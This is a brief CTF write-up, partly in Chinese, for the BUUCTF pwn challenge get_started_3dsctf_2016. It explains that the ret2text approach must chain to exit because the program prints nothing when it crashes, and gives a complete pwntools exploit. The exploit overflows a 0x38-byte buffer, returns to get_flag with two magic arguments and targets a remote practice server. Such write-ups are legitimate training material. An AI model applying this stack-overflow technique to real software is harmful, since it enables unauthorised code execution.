pwn | get_started_3dsctf_2016

get_started_3dsctf_2016

ret2text
坑爹题，程序异常结束就无回显，得跳转到exit函数

exp:

from pwn import *
import time 

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 25656)

p_getflag = 0x80489a0

p_main = 0x08048A20

p_exit = 0x0804E6A0
# sh.recv(1024)


payload = 0x38 * b'm' + p32(p_getflag) + p32(p_exit) + p32(0x308CD64F) + p32(0x195719D1)

sh.sendline(payload)

sh.interactive()

sh.close()